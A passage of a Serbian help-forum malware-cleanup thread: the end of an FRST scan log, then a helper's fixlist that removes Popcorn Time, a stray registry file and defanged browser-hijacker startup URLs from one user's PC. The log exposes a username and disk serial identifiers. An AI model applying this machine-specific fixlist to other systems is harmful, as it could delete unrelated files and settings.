2017-08-09 22:02 - 2017-08-01 04:20 - 001156608 _____ (Microsoft Corporation) C:\WINDOWS\system32\werconcpl.dll
2017-08-09 22:02 - 2017-08-01 04:20 - 000404480 _____ (Microsoft Corporation) C:\WINDOWS\system32\werui.dll
2017-08-09 22:02 - 2017-08-01 04:20 - 000154624 _____ (Microsoft Corporation) C:\WINDOWS\system32\DWWIN.EXE
2017-08-09 22:02 - 2017-08-01 04:20 - 000073216 _____ (Microsoft Corporation) C:\WINDOWS\system32\wsqmcons.exe
2017-08-09 22:02 - 2017-08-01 04:20 - 000067584 _____ (Microsoft Corporation) C:\WINDOWS\system32\wercplsupport.dll
2017-08-09 22:02 - 2017-08-01 04:17 - 000147456 _____ (Microsoft Corporation) C:\WINDOWS\system32\MdmDiagnostics.dll
2017-08-09 22:02 - 2017-08-01 04:16 - 000101376 _____ (Microsoft Corporation) C:\WINDOWS\system32\policymanagerprecheck.dll
2017-08-09 22:02 - 2017-08-01 04:15 - 000239616 _____ (Microsoft Corporation) C:\WINDOWS\system32\dmenterprisediagnostics.dll
2017-08-09 22:02 - 2017-08-01 04:13 - 000127488 _____ (Microsoft Corporation) C:\WINDOWS\system32\fdeploy.dll
2017-08-09 22:02 - 2017-08-01 04:12 - 000404992 _____ (Microsoft Corporation) C:\WINDOWS\system32\SmsRouterSvc.dll
2017-08-09 22:02 - 2017-08-01 04:09 - 000394240 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Internal.Management.dll
2017-08-09 22:02 - 2017-08-01 04:01 - 000242688 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeviceEnroller.exe
2017-08-07 18:11 - 2017-08-07 18:11 - 000000979 _____ C:\Users\Public\Desktop\AVG Protection.lnk
2017-08-07 18:11 - 2017-08-07 18:11 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVG
2017-08-07 18:08 - 2017-08-07 18:08 - 000000000 ___HD C:\$AVG
2017-08-07 18:06 - 2017-08-27 16:21 - 000000000 ____D C:\ProgramData\MFAData
2017-08-05 17:21 - 2017-08-05 17:21 - 000001321 _____ C:\Users\dejan\Desktop\Continue Adobe Flash Player Installation.lnk
2017-08-05 00:15 - 2017-08-05 00:15 - 000005554 _____ C:\WINDOWS\system32\PerfStringBackup.TMP
2017-08-04 01:05 - 2017-07-28 06:48 - 001972128 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ntfs.sys
2017-08-04 01:05 - 2017-07-28 06:48 - 001854832 _____ (Microsoft Corporation) C:\WINDOWS\system32\KernelBase.dll
2017-08-04 01:05 - 2017-07-28 06:48 - 000358816 _____ (Microsoft Corporation) C:\WINDOWS\system32\halmacpi.dll
2017-08-04 01:05 - 2017-07-28 06:48 - 000358816 _____ (Microsoft Corporation) C:\WINDOWS\system32\hal.dll
2017-08-04 01:05 - 2017-07-28 06:48 - 000100232 _____ (Microsoft Corporation) C:\WINDOWS\system32\bcd.dll
2017-08-04 01:05 - 2017-07-28 06:47 - 002259768 _____ (Microsoft Corporation) C:\WINDOWS\system32\CoreUIComponents.dll
2017-08-04 01:05 - 2017-07-28 06:47 - 000572320 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\acpi.sys
2017-08-04 01:05 - 2017-07-28 06:44 - 000239008 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\msiscsi.sys
2017-08-04 01:05 - 2017-07-28 06:40 - 005820984 _____ (Microsoft Corporation) C:\WINDOWS\system32\windows.storage.dll
2017-08-04 01:05 - 2017-07-28 06:40 - 000551200 _____ (Microsoft Corporation) C:\WINDOWS\system32\dxgi.dll
2017-08-04 01:05 - 2017-07-28 06:39 - 000434592 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\USBHUB3.SYS
2017-08-04 01:05 - 2017-07-28 06:38 - 004213656 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.StateRepository.dll
2017-08-04 01:05 - 2017-07-28 06:38 - 000216504 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininit.exe
2017-08-04 01:05 - 2017-07-28 06:37 - 000519680 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentClient.dll
2017-08-04 01:05 - 2017-07-28 06:36 - 006761568 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Protection.PlayReady.dll
2017-08-04 01:05 - 2017-07-28 06:36 - 005808640 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.dll
2017-08-04 01:05 - 2017-07-28 06:36 - 002424024 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfmp4srcsnk.dll
2017-08-04 01:05 - 2017-07-28 06:36 - 000866808 _____ (Microsoft Corporation) C:\WINDOWS\system32\DolbyDecMFT.dll
2017-08-04 01:05 - 2017-07-28 06:35 - 000988168 _____ (Microsoft Corporation) C:\WINDOWS\system32\ole32.dll
2017-08-04 01:05 - 2017-07-28 06:33 - 002081184 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tcpip.sys
2017-08-04 01:05 - 2017-07-28 06:33 - 000440184 _____ (Microsoft Corporation) C:\WINDOWS\system32\services.exe
2017-08-04 01:05 - 2017-07-28 06:33 - 000414296 _____ (Microsoft Corporation) C:\WINDOWS\system32\TextInputFramework.dll
2017-08-04 01:05 - 2017-07-28 06:24 - 000116736 _____ (Microsoft Corporation) C:\WINDOWS\system32\dwmredir.dll
2017-08-04 01:05 - 2017-07-28 06:21 - 000035328 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\UcmUcsi.sys
2017-08-04 01:05 - 2017-07-28 06:21 - 000029184 _____ (Microsoft Corporation) C:\WINDOWS\system32\cmintegrator.dll
2017-08-04 01:05 - 2017-07-28 06:20 - 000093184 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\bridge.sys
2017-08-04 01:05 - 2017-07-28 06:20 - 000079872 _____ (Microsoft Corporation) C:\WINDOWS\system32\wudriver.dll
2017-08-04 01:05 - 2017-07-28 06:19 - 000147456 _____ (Microsoft Corporation) C:\WINDOWS\system32\VCardParser.dll
2017-08-04 01:05 - 2017-07-28 06:19 - 000117760 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.StateRepositoryUpgrade.dll
2017-08-04 01:05 - 2017-07-28 06:16 - 001291776 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSVPXENC.dll
2017-08-04 01:05 - 2017-07-28 06:16 - 000585728 _____ (Microsoft Corporation) C:\WINDOWS\system32\FlightSettings.dll
2017-08-04 01:05 - 2017-07-28 06:16 - 000470016 _____ (Microsoft Corporation) C:\WINDOWS\system32\TpmCoreProvisioning.dll
2017-08-04 01:05 - 2017-07-28 06:16 - 000359424 _____ (Microsoft Corporation) C:\WINDOWS\system32\aadcloudap.dll
2017-08-04 01:05 - 2017-07-28 06:16 - 000171520 _____ (Microsoft Corporation) C:\WINDOWS\system32\psmsrv.dll
2017-08-04 01:05 - 2017-07-28 06:16 - 000167424 _____ (Microsoft Corporation) C:\WINDOWS\system32\storewuauth.dll
2017-08-04 01:05 - 2017-07-28 06:15 - 005721600 _____ (Microsoft Corporation) C:\WINDOWS\system32\BingMaps.dll
2017-08-04 01:05 - 2017-07-28 06:15 - 000581120 _____ (Microsoft Corporation) C:\WINDOWS\system32\wbiosrvc.dll
2017-08-04 01:05 - 2017-07-28 06:14 - 000678912 _____ (Microsoft Corporation) C:\WINDOWS\system32\bisrv.dll
2017-08-04 01:05 - 2017-07-28 06:14 - 000617984 _____ (Microsoft Corporation) C:\WINDOWS\system32\LogonController.dll
2017-08-04 01:05 - 2017-07-28 06:14 - 000368128 _____ (Microsoft Corporation) C:\WINDOWS\system32\InstallAgentUserBroker.exe
2017-08-04 01:05 - 2017-07-28 06:14 - 000357888 _____ (Microsoft Corporation) C:\WINDOWS\system32\ActivationManager.dll
2017-08-04 01:05 - 2017-07-28 06:14 - 000331264 _____ (Microsoft Corporation) C:\WINDOWS\system32\rastlsext.dll
2017-08-04 01:05 - 2017-07-28 06:13 - 000665600 _____ (Microsoft Corporation) C:\WINDOWS\system32\netlogon.dll
2017-08-04 01:05 - 2017-07-28 06:13 - 000457216 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppReadiness.dll
2017-08-04 01:05 - 2017-07-28 06:12 - 000337920 _____ (Microsoft Corporation) C:\WINDOWS\system32\InstallAgent.exe
2017-08-04 01:05 - 2017-07-28 06:11 - 003667456 _____ (Microsoft Corporation) C:\WINDOWS\system32\D3DCompiler_47.dll
2017-08-04 01:05 - 2017-07-28 06:09 - 005225984 _____ (Microsoft Corporation) C:\WINDOWS\system32\d2d1.dll
2017-08-04 01:05 - 2017-07-28 06:08 - 004559360 _____ (Microsoft Corporation) C:\WINDOWS\system32\dbgeng.dll
2017-08-04 01:05 - 2017-07-28 06:08 - 004056064 _____ (Microsoft Corporation) C:\WINDOWS\system32\MFMediaEngine.dll
2017-08-04 01:05 - 2017-07-28 06:07 - 002211840 _____ (Microsoft Corporation) C:\WINDOWS\system32\InputService.dll
2017-08-04 01:05 - 2017-07-28 06:04 - 000073728 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\bthhfenum.sys
2017-08-04 01:05 - 2017-07-28 06:03 - 000089088 _____ (Microsoft Corporation) C:\WINDOWS\system32\MDMAppInstaller.exe
2017-08-04 01:05 - 2017-07-28 06:03 - 000085504 _____ (Microsoft Corporation) C:\WINDOWS\system32\RjvMDMConfig.dll
2017-08-04 01:05 - 2017-07-28 06:03 - 000062464 _____ (Microsoft Corporation) C:\WINDOWS\system32\EnterpriseDesktopAppMgmtCSP.dll
2017-08-04 01:05 - 2017-07-28 06:03 - 000046080 _____ (Microsoft Corporation) C:\WINDOWS\system32\DmApiSetExtImplDesktop.dll
2017-08-04 01:05 - 2017-07-28 06:02 - 001377280 _____ (Microsoft Corporation) C:\WINDOWS\system32\workfolderssvc.dll
2017-08-04 01:04 - 2017-07-28 07:07 - 000805816 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.dll
2017-08-04 01:04 - 2017-07-28 06:48 - 000096648 _____ (Microsoft Corporation) C:\WINDOWS\system32\dmcmnutils.dll
2017-08-04 01:04 - 2017-07-28 06:46 - 000698384 _____ (Microsoft Corporation) C:\WINDOWS\system32\CoreMessaging.dll
2017-08-04 01:04 - 2017-07-28 06:40 - 000755616 _____ (Microsoft Corporation) C:\WINDOWS\system32\efscore.dll
2017-08-04 01:04 - 2017-07-28 06:38 - 000777400 _____ (Microsoft Corporation) C:\WINDOWS\system32\ClipSVC.dll
2017-08-04 01:04 - 2017-07-28 06:38 - 000597920 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\fvevol.sys
2017-08-04 01:04 - 2017-07-28 06:36 - 020373408 _____ (Microsoft Corporation) C:\WINDOWS\system32\shell32.dll
2017-08-04 01:04 - 2017-07-28 06:36 - 001195760 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioEng.dll
2017-08-04 01:04 - 2017-07-28 06:36 - 000864248 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioSes.dll
2017-08-04 01:04 - 2017-07-28 06:36 - 000173104 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfsensorgroup.dll
2017-08-04 01:04 - 2017-07-28 06:36 - 000090464 _____ (Microsoft Corporation) C:\WINDOWS\system32\msacm32.dll
2017-08-04 01:04 - 2017-07-28 06:35 - 000277432 _____ (Microsoft Corporation) C:\WINDOWS\system32\shlwapi.dll
2017-08-04 01:04 - 2017-07-28 06:33 - 000967584 _____ (Microsoft Corporation) C:\WINDOWS\system32\ReAgent.dll
2017-08-04 01:04 - 2017-07-28 06:25 - 003464704 _____ (Microsoft Corporation) C:\WINDOWS\system32\UIRibbon.dll
2017-08-04 01:04 - 2017-07-28 06:24 - 000584192 _____ (Microsoft Corporation) C:\WINDOWS\system32\UIRibbonRes.dll
2017-08-04 01:04 - 2017-07-28 06:21 - 000065024 _____ (Microsoft Corporation) C:\WINDOWS\system32\ofdeploy.exe
2017-08-04 01:04 - 2017-07-28 06:20 - 000206848 _____ (Microsoft Corporation) C:\WINDOWS\system32\DolbyMATEnc.dll
2017-08-04 01:04 - 2017-07-28 06:20 - 000095744 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuuhosdeployment.dll
2017-08-04 01:04 - 2017-07-28 06:20 - 000081408 _____ (Microsoft Corporation) C:\WINDOWS\system32\officecsp.dll
2017-08-04 01:04 - 2017-07-28 06:20 - 000018432 _____ (Microsoft Corporation) C:\WINDOWS\system32\IpNatHlpClient.dll
2017-08-04 01:04 - 2017-07-28 06:19 - 000036352 _____ (Microsoft Corporation) C:\WINDOWS\system32\TpmTasks.dll
2017-08-04 01:04 - 2017-07-28 06:18 - 000703488 _____ (Microsoft Corporation) C:\WINDOWS\system32\DolbyHrtfEnc.dll
2017-08-04 01:04 - 2017-07-28 06:18 - 000139776 _____ (Microsoft Corporation) C:\WINDOWS\system32\BluetoothApis.dll
2017-08-04 01:04 - 2017-07-28 06:17 - 006728192 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.dll
2017-08-04 01:04 - 2017-07-28 06:17 - 000661504 _____ C:\WINDOWS\system32\MBR2GPT.EXE
2017-08-04 01:04 - 2017-07-28 06:17 - 000393216 _____ (Microsoft Corporation) C:\WINDOWS\system32\bcdedit.exe
2017-08-04 01:04 - 2017-07-28 06:17 - 000338944 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Shell.BlueLightReduction.dll
2017-08-04 01:04 - 2017-07-28 06:17 - 000203776 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_Flights.dll
2017-08-04 01:04 - 2017-07-28 06:17 - 000168960 _____ (Microsoft Corporation) C:\WINDOWS\system32\bcdboot.exe
2017-08-04 01:04 - 2017-07-28 06:16 - 000332288 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_Display.dll
2017-08-04 01:04 - 2017-07-28 06:16 - 000272384 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_Notifications.dll
2017-08-04 01:04 - 2017-07-28 06:16 - 000135680 _____ (Microsoft Corporation) C:\WINDOWS\system32\qasf.dll
2017-08-04 01:04 - 2017-07-28 06:15 - 000586752 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Security.Authentication.Web.Core.dll
2017-08-04 01:04 - 2017-07-28 06:15 - 000578560 _____ (Microsoft Corporation) C:\WINDOWS\system32\XblAuthManager.dll
2017-08-04 01:04 - 2017-07-28 06:15 - 000414720 _____ (Microsoft Corporation) C:\WINDOWS\system32\TileDataRepository.dll
2017-08-04 01:04 - 2017-07-28 06:14 - 000844800 _____ (Microsoft Corporation) C:\WINDOWS\system32\lpasvc.dll
2017-08-04 01:04 - 2017-07-28 06:14 - 000435712 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Networking.UX.EapRequestHandler.dll
2017-08-04 01:04 - 2017-07-28 06:14 - 000177664 _____ (Microsoft Corporation) C:\WINDOWS\system32\SIHClient.exe
2017-08-04 01:04 - 2017-07-28 06:13 - 001208320 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.desktop.dll
2017-08-04 01:04 - 2017-07-28 06:13 - 000932352 _____ (Microsoft Corporation) C:\WINDOWS\system32\GamePanel.exe
2017-08-04 01:04 - 2017-07-28 06:13 - 000636416 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpcWebFilter.dll
2017-08-04 01:04 - 2017-07-28 06:12 - 000952832 _____ (Microsoft Corporation) C:\WINDOWS\system32\comdlg32.dll
2017-08-04 01:04 - 2017-07-28 06:12 - 000587776 _____ (Microsoft Corporation) C:\WINDOWS\system32\PCPKsp.dll
2017-08-04 01:04 - 2017-07-28 06:12 - 000446464 _____ (Microsoft Corporation) C:\WINDOWS\system32\rastls.dll
2017-08-04 01:04 - 2017-07-28 06:12 - 000364032 _____ (Microsoft Corporation) C:\WINDOWS\system32\facecredentialprovider.dll
2017-08-04 01:04 - 2017-07-28 06:11 - 001513984 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.onecore.dll
2017-08-04 01:04 - 2017-07-28 06:11 - 001248768 _____ (Microsoft Corporation) C:\WINDOWS\system32\AzureSettingSyncProvider.dll
2017-08-04 01:04 - 2017-07-28 06:11 - 000962048 _____ (Microsoft Corporation) C:\WINDOWS\system32\dosvc.dll
2017-08-04 01:04 - 2017-07-28 06:10 - 001019904 _____ (Microsoft Corporation) C:\WINDOWS\system32\aadtb.dll
2017-08-04 01:04 - 2017-07-28 06:10 - 000787456 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuapi.dll
2017-08-04 01:04 - 2017-07-28 06:10 - 000564224 _____ (Microsoft Corporation) C:\WINDOWS\system32\shsvcs.dll
2017-08-04 01:04 - 2017-07-28 06:09 - 002370048 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentServer.dll
2017-08-04 01:04 - 2017-07-28 06:09 - 002040832 _____ (Microsoft Corporation) C:\WINDOWS\system32\Microsoft.Bluetooth.Profiles.Gatt.dll
2017-08-04 01:04 - 2017-07-28 06:08 - 004417024 _____ (Microsoft Corporation) C:\WINDOWS\system32\ExplorerFrame.dll
2017-08-04 01:04 - 2017-07-28 06:08 - 002122240 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuaueng.dll
2017-08-04 01:04 - 2017-07-28 06:08 - 000772096 _____ (Microsoft Corporation) C:\WINDOWS\system32\MPSSVC.dll
2017-08-04 01:04 - 2017-07-28 06:08 - 000760832 _____ (Microsoft Corporation) C:\WINDOWS\system32\rasapi32.dll
2017-08-04 01:04 - 2017-07-28 06:08 - 000316416 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuuhext.dll
2017-08-04 01:04 - 2017-07-28 06:06 - 001126912 _____ (Microsoft Corporation) C:\WINDOWS\system32\audiosrv.dll
2017-08-04 01:04 - 2017-07-28 06:06 - 000558080 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioEndpointBuilder.dll
2017-08-04 01:04 - 2017-07-28 06:05 - 001536512 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Immersive.dll
2017-08-04 01:04 - 2017-07-28 06:05 - 000892928 _____ (Microsoft Corporation) C:\WINDOWS\system32\autochk.exe
2017-08-04 01:04 - 2017-07-28 06:05 - 000538112 _____ (Microsoft Corporation) C:\WINDOWS\system32\untfs.dll
2017-08-04 01:04 - 2017-07-28 06:04 - 000512000 _____ (Microsoft Corporation) C:\WINDOWS\system32\FrameServer.dll
2017-08-04 01:04 - 2017-07-28 06:02 - 001244160 _____ (Microsoft Corporation) C:\WINDOWS\system32\RecoveryDrive.exe
2017-08-04 01:04 - 2017-07-28 06:02 - 000949248 _____ (Microsoft Corporation) C:\WINDOWS\system32\reseteng.dll
2017-08-04 01:04 - 2017-07-28 06:02 - 000877056 _____ (Microsoft Corporation) C:\WINDOWS\system32\autoconv.exe
2017-08-04 01:04 - 2017-07-28 06:02 - 000853504 _____ (Microsoft Corporation) C:\WINDOWS\system32\autofmt.exe
2017-08-04 01:04 - 2017-07-28 06:02 - 000500224 _____ (Microsoft Corporation) C:\WINDOWS\system32\BootMenuUX.dll
2017-08-04 01:04 - 2017-07-28 06:02 - 000077312 _____ (Microsoft Corporation) C:\WINDOWS\system32\spbcd.dll
2017-08-04 01:04 - 2017-07-28 06:01 - 000065024 _____ (Microsoft Corporation) C:\WINDOWS\system32\setbcdlocale.dll

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2017-08-27 16:22 - 2017-06-27 13:53 - 000227188 _____ C:\WINDOWS\ZAM.krnl.trace
2017-08-27 16:22 - 2017-06-27 13:53 - 000202465 _____ C:\WINDOWS\ZAM_Guard.krnl.trace
2017-08-27 16:18 - 2017-03-18 08:02 - 000008192 _____ C:\WINDOWS\system32\config\ELAM
2017-08-27 16:15 - 2017-06-13 16:52 - 000000000 ____D C:\WINDOWS\system32\SleepStudy
2017-08-27 02:00 - 2017-03-07 16:58 - 000000000 ____D C:\Users\dejan\AppData\Local\Adobe
2017-08-27 00:19 - 2017-05-28 21:24 - 000000000 ____D C:\Program Files\Mozilla Firefox
2017-08-26 23:52 - 2017-04-26 16:31 - 000000000 ____D C:\Users\dejan\AppData\Local\Facebook
2017-08-26 23:49 - 2017-06-13 16:57 - 000000000 ____D C:\Users\dejan
2017-08-26 23:49 - 2016-09-24 16:45 - 000000000 ____D C:\Users\dejan\AppData\Roaming\Messenger for Desktop
2017-08-26 19:39 - 2016-11-18 20:21 - 000000000 ____D C:\Users\dejan\AppData\Roaming\DMCache
2017-08-26 18:39 - 2017-03-18 20:23 - 000000000 ____D C:\WINDOWS\AppReadiness
2017-08-25 19:14 - 2017-03-11 19:22 - 000000000 ____D C:\Users\dejan\AppData\Roaming\IDM
2017-08-25 18:31 - 2017-03-18 20:23 - 000000000 ____D C:\WINDOWS\system32\NDF
2017-08-25 14:29 - 2017-03-18 20:23 - 000000000 ___HD C:\Program Files\WindowsApps
2017-08-25 14:29 - 2017-01-28 21:39 - 000002218 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2017-08-25 14:29 - 2017-01-28 21:39 - 000002206 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2017-08-25 14:29 - 2016-09-07 15:27 - 000000000 ____D C:\Users\dejan\AppData\Local\Packages
2017-08-25 14:26 - 2017-06-15 22:56 - 000000000 ____D C:\Program Files\Popcorn Time
2017-08-25 14:23 - 2017-06-13 17:29 - 000000006 ____H C:\WINDOWS\Tasks\SA.DAT
2017-08-23 23:25 - 2017-03-15 17:46 - 000002282 _____ C:\Users\dejan\Desktop\Google Chrome.lnk
2017-08-23 23:19 - 2017-06-30 19:01 - 000154124 ____N C:\WINDOWS\Minidump\082317-49609-01.dmp
2017-08-23 23:19 - 2017-06-13 17:56 - 000000000 ____D C:\WINDOWS\Minidump
2017-08-23 00:23 - 2017-01-01 00:36 - 000000000 ____D C:\Users\dejan\AppData\Roaming\vlc
2017-08-22 22:33 - 2017-04-17 20:40 - 000000000 ____D C:\Users\dejan\Downloads\Compressed
2017-08-19 19:13 - 2017-03-18 20:23 - 000000000 ____D C:\WINDOWS\LiveKernelReports
2017-08-14 23:50 - 2017-03-18 08:02 - 000524288 _____ C:\WINDOWS\system32\config\BBI
2017-08-12 19:41 - 2017-03-18 20:21 - 000000000 ____D C:\WINDOWS\INF
2017-08-12 19:39 - 2016-09-08 21:40 - 000001038 _____ C:\Users\Public\Desktop\CCleaner.lnk
2017-08-12 19:33 - 2016-09-08 21:40 - 000000000 ____D C:\Program Files\CCleaner
2017-08-12 12:34 - 2017-03-18 20:14 - 000000000 ____D C:\WINDOWS\CbsTemp
2017-08-11 03:32 - 2017-03-18 20:23 - 000000000 ____D C:\WINDOWS\rescache
2017-08-11 00:17 - 2017-06-13 16:51 - 000223632 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2017-08-09 22:09 - 2016-09-07 17:53 - 000000000 ____D C:\WINDOWS\system32\MRT
2017-08-09 22:04 - 2016-09-07 17:53 - 137505280 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2017-08-08 23:48 - 2017-03-18 20:23 - 000000000 ____D C:\WINDOWS\system32\Macromed
2017-08-08 19:10 - 2016-12-06 00:06 - 000170200 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MBAMSwissArmy.sys
2017-08-07 22:50 - 2016-12-09 23:37 - 000000000 ____D C:\Users\dejan\AppData\LocalLow\Mozilla
2017-08-07 19:15 - 2017-06-01 13:14 - 000000000 ____D C:\Users\dejan\AppData\Roaming\WinSAPSvc
2017-08-07 19:09 - 2017-05-27 15:46 - 000000000 ____D C:\Users\dejan\AppData\Local\terana
2017-08-07 18:55 - 2017-06-01 13:14 - 000000000 ____D C:\Users\dejan\AppData\Local\glory
2017-08-07 18:12 - 2016-09-14 15:56 - 000000000 ____D C:\Users\dejan\AppData\Local\Avg
2017-08-07 18:11 - 2017-03-18 20:23 - 000000000 ___HD C:\WINDOWS\ELAMBKUP
2017-08-07 18:06 - 2016-12-31 15:39 - 000000000 ____D C:\Program Files\AVG
2017-08-07 18:06 - 2016-09-14 15:56 - 000000000 ____D C:\ProgramData\Avg
2017-08-07 18:05 - 2016-09-14 15:56 - 000000000 ____D C:\Users\dejan\AppData\Local\AvgSetupLog
2017-08-07 18:01 - 2016-09-14 16:26 - 000000000 ____D C:\Users\dejan\AppData\Roaming\AVG
2017-08-05 00:14 - 2016-04-27 06:38 - 000000000 __RHD C:\Users\Public\AccountPictures
2017-08-04 19:18 - 2017-06-13 17:17 - 001135462 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2017-08-04 19:11 - 2017-03-18 20:23 - 000000000 ___RD C:\WINDOWS\ImmersiveControlPanel
2017-08-04 19:11 - 2017-03-18 20:23 - 000000000 ____D C:\WINDOWS\system32\WinMetadata
2017-08-04 19:11 - 2017-03-18 20:23 - 000000000 ____D C:\WINDOWS\system32\WinBioPlugIns
2017-08-04 19:11 - 2017-03-18 20:23 - 000000000 ____D C:\WINDOWS\system32\oobe
2017-08-04 19:11 - 2017-03-18 20:23 - 000000000 ____D C:\WINDOWS\ShellExperiences
2017-08-04 19:11 - 2017-03-18 20:23 - 000000000 ____D C:\Program Files\Windows Photo Viewer
2017-07-31 17:15 - 2017-03-18 20:25 - 000835576 _____ (Adobe Systems Incorporated) C:\WINDOWS\system32\FlashPlayerApp.exe
2017-07-31 17:15 - 2017-03-18 20:25 - 000177648 _____ (Adobe Systems Incorporated) C:\WINDOWS\system32\FlashPlayerCPLApp.cpl
2017-07-29 00:05 - 2016-10-02 00:51 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\GOM
2017-07-29 00:05 - 2016-09-07 23:10 - 000001230 _____ C:\Users\dejan\AppData\Roaming\Microsoft\Windows\Start Menu\GOM Player.lnk
2017-07-29 00:05 - 2016-09-07 23:10 - 000001206 _____ C:\Users\Public\Desktop\GOM Player.lnk

==================== Files in the root of some directories =======

2016-09-23 15:24 - 2016-10-19 12:50 - 000000396 _____ () C:\Users\dejan\AppData\Roaming\burnaware.ini
2016-12-09 01:04 - 2017-02-03 01:46 - 000001002 _____ () C:\Users\dejan\AppData\Roaming\downloads.json
2016-12-26 18:32 - 2016-12-26 18:32 - 000000353 _____ () C:\Users\dejan\AppData\Roaming\imagetuner.ini
2016-12-10 20:57 - 2016-12-11 23:26 - 000004608 _____ () C:\Users\dejan\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2017-04-16 20:41 - 2017-04-16 20:41 - 000003370 _____ () C:\Users\dejan\AppData\Local\recently-used.xbel
2017-06-12 15:05 - 2017-06-12 15:05 - 000000017 _____ () C:\Users\dejan\AppData\Local\resmon.resmoncfg
2017-01-04 22:23 - 2017-01-07 22:01 - 000000176 _____ () C:\Users\dejan\AppData\Local\uts.ini

Files to move or delete:
====================
C:\Users\dejan\k350n_.reg


==================== Bamital & volsnap ======================

(There is no automatic fix for files that do not pass verification.)

C:\WINDOWS\explorer.exe => File is digitally signed
C:\WINDOWS\system32\winlogon.exe => File is digitally signed
C:\WINDOWS\system32\wininit.exe => File is digitally signed
C:\WINDOWS\system32\svchost.exe => File is digitally signed
C:\WINDOWS\system32\services.exe => File is digitally signed
C:\WINDOWS\system32\User32.dll => File is digitally signed
C:\WINDOWS\system32\userinit.exe => File is digitally signed
C:\WINDOWS\system32\rpcss.dll => File is digitally signed
C:\WINDOWS\system32\dnsapi.dll => File is digitally signed
C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2017-08-12 20:08

==================== End of FRST.txt ============================
https://www.mycity.rs/must-login.png

offline
  • Pridružio: 14 Jun 2016
  • Poruke: 535

Otvori Notepad i iskopiraj sljedeći tekst koji se nalazi unutar Kod polja.

CreateRestorePoint:
(Popcorn Time) C:\Program Files\Popcorn Time\Updater.exe
C:\Program Files\Popcorn Time
CHR StartupUrls: ChromeDefaultData -> "hxxp://www.google.com/","hxxp://www.youndoo.com/?z=61bcc231723f316e9912186g2z5b6teo2w2zazczaq&from=amz&uid=WDCXWD3200AVJS-63B6A0_WD-WCAT1A29657496574&type=hp","hxxp://www.search.ask.com/?o=APN10640A&gct=hp&d=473-102&v=a12627-333&t=4","hxxp://www.initialsite123.com/?z=53e8deaf6335b4feab6622eg8z8t0g5mbw7q9b8w6o&from=icb&uid=HitachiXHDS721050CLA362_JPF521HA3EJ06V3EJ06VX&type=hp"
CHR Profile: C:\Users\dejan\AppData\Local\Google\Chrome\User Data\ChromeDefaultData [2017-08-27] <==== ATTENTION
C:\Users\dejan\k350n_.reg
R2 Update service; C:\Program Files\Popcorn Time\Updater.exe [339968 2016-08-26] (Popcorn Time) [File not signed]
HKU\S-1-5-21-2725342497-1767379937-2485888434-1001\...\ChromeHTML: ->  <==== ATTENTION
CustomCLSID: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{0000002F-0000-0000-C000-000000000046}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{00020420-0000-0000-C000-000000000046}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{00020421-0000-0000-C000-000000000046}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{00020422-0000-0000-C000-000000000046}\InprocServer32 -> no filepath
